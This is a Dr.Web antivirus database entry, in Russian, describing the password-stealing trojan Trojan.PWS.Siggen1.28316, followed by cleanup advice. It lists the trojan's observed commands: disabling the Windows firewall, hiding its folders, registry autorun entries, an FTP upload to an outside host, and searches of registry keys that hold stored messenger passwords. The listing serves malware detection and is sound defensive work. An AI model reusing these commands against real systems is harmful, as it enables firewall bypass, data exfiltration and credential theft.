Поддержка
Круглосуточная поддержка

Позвоните

Бесплатно по России:
8-800-333-79-32

ЧаВо | Форум

Ваши запросы

  • Все: -
  • Незакрытые: -
  • Последний: -

Позвоните

Бесплатно по России:
8-800-333-79-32

Свяжитесь с нами Незакрытые запросы: 

Профиль

Профиль

Trojan.PWS.Siggen1.28316

Добавлен в вирусную базу Dr.Web: 2014-05-28

Описание добавлено:

Техническая информация

Для обеспечения автозапуска и распространения:
Модифицирует следующие ключи реестра:
  • [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'stat2' = '%ALLUSERSPROFILE%\Msn\Msn2\aatd.bat'
  • [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'stat' = '%ALLUSERSPROFILE%\Msn\Msn2\aatd.bat'
Вредоносные функции:
Для обхода брандмауэра удаляет или модифицирует следующие ключи реестра:
  • [<HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile] 'DoNotAllowExceptions' = '00000000'
  • [<HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile] 'EnableFirewall' = '00000000'
Создает и запускает на исполнение:
  • 'C:\users\public\Public Document\msnd.exe'
  • 'C:\users\public\Public Document\picture viewer.exe' wmsn.klm
  • 'C:\users\public\Public Document\image.exe' msn.klm
Запускает на исполнение:
  • '<SYSTEM32>\attrib.exe' +r +a +s +h "%ALLUSERSPROFILE%\Msn"
  • '<SYSTEM32>\netsh.exe' firewall set opmode disable
  • '<SYSTEM32>\attrib.exe' +r +a +s +h "%ALLUSERSPROFILE%\Msn\Msn2"
  • '<SYSTEM32>\ftp.exe' -i -v -s:bms.klm ftp.drivehq.com
  • '<SYSTEM32>\attrib.exe' +r +a +s +h "C:\users\public\public document"
  • '<SYSTEM32>\cmd.exe' /c ""C:\users\public\Public Document\ictd.bat" "
  • '<SYSTEM32>\wscript.exe' "C:\users\public\Public Document\sad.vbs"
  • '%WINDIR%\regedit.exe' /s "cond.reg"
  • '<SYSTEM32>\xcopy.exe' /h /e /r /k /c /q /y *.* "%ALLUSERSPROFILE%\Msn\Msn2"
  • '<SYSTEM32>\rundll32.exe' <SYSTEM32>\shell32.dll,OpenAs_RunDLL C:\users\public\Public Document\pid.PDF
Ищет ветки реестра, отвечающие за хранение паролей сторонними программами:
  • [<HKCU>\Software\Paltalk]
  • [<HKCU>\Software\Google\Google Talk\Accounts]
Изменения в файловой системе:
Создает следующие файлы:
  • %ALLUSERSPROFILE%\Msn\Msn2\ictd.bat
  • %ALLUSERSPROFILE%\Msn\Msn2\ied.bat
  • %ALLUSERSPROFILE%\Msn\Msn2\iewed.bat
  • %ALLUSERSPROFILE%\Msn\Msn2\icd.bat
  • %ALLUSERSPROFILE%\Msn\Msn2\bms.klm
  • %ALLUSERSPROFILE%\Msn\Msn2\cond.reg
  • %ALLUSERSPROFILE%\Msn\Msn2\dd.vbs
  • %ALLUSERSPROFILE%\Msn\Msn2\image.exe
  • %ALLUSERSPROFILE%\Msn\Msn2\sad.vbs
  • C:\users\public\Public Document\msn.klm
  • C:\users\public\Public Document\wmsn.klm
  • %ALLUSERSPROFILE%\Msn\Msn2\pid.PDF
  • %ALLUSERSPROFILE%\Msn\Msn2\keeprun.ini
  • %ALLUSERSPROFILE%\Msn\Msn2\msnd.exe
  • %ALLUSERSPROFILE%\Msn\Msn2\picture viewer.exe
  • C:\users\public\Public Document\keeprun.ini
  • C:\users\public\Public Document\image.exe
  • C:\users\public\Public Document\iewed.bat
  • C:\users\public\Public Document\msnd.exe
  • C:\users\public\Public Document\sad.vbs
  • C:\users\public\Public Document\pid.PDF
  • C:\users\public\Public Document\picture viewer.exe
  • C:\users\public\Public Document\ied.bat
  • C:\users\public\Public Document\bms.klm
  • C:\users\public\Public Document\aatd.bat
  • %ALLUSERSPROFILE%\Msn\Msn2\aatd.bat
  • C:\users\public\Public Document\cond.reg
  • C:\users\public\Public Document\ictd.bat
  • C:\users\public\Public Document\icd.bat
  • C:\users\public\Public Document\dd.vbs
Перемещает следующие файлы:
  • C:\users\public\Public Document\wmsn.klm в C:\users\public\Public Document\PIC_201422Tu_ _1717520 .015
  • C:\users\public\Public Document\msn.klm в C:\users\public\Public Document\PIC_201422Tu_ _1717520 .014
Сетевая активность:
Подключается к:
  • 'localhost':1040
  • 'ft#.#rivehq.com':21
UDP:
  • DNS ASK ft#.#rivehq.com
Другое:
Ищет следующие окна:
  • ClassName: 'Shell_TrayWnd' WindowName: '(null)'
  • ClassName: 'Indicator' WindowName: '(null)'
  • ClassName: 'RegEdit_RegEdit' WindowName: '(null)'

Рекомендации по лечению

  1. В случае если операционная система способна загрузиться (в штатном режиме или режиме защиты от сбоев), скачайте лечащую утилиту Dr.Web CureIt! и выполните с ее помощью полную проверку вашего компьютера, а также используемых вами переносных носителей информации.
  2. Если загрузка операционной системы невозможна, измените настройки BIOS вашего компьютера, чтобы обеспечить возможность загрузки ПК с компакт-диска или USB-накопителя. Скачайте образ аварийного диска восстановления системы Dr.Web® LiveDisk или утилиту записи Dr.Web® LiveDisk на USB-накопитель, подготовьте соответствующий носитель. Загрузив компьютер с использованием данного носителя, выполните его полную проверку и лечение обнаруженных угроз.
Скачать Dr.Web

По серийному номеру

Выполните полную проверку системы с использованием Антивируса Dr.Web Light для macOS. Данный продукт можно загрузить с официального сайта Apple App Store.

На загруженной ОС выполните полную проверку всех дисковых разделов с использованием продукта Антивирус Dr.Web для Linux.

Скачать Dr.Web

По серийному номеру

  1. Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light. Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
  2. Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
    • загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
    • после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
    • выключите устройство и включите его в обычном режиме.

Подробнее о Dr.Web для Android

Демо бесплатно на 14 дней

Выдаётся при установке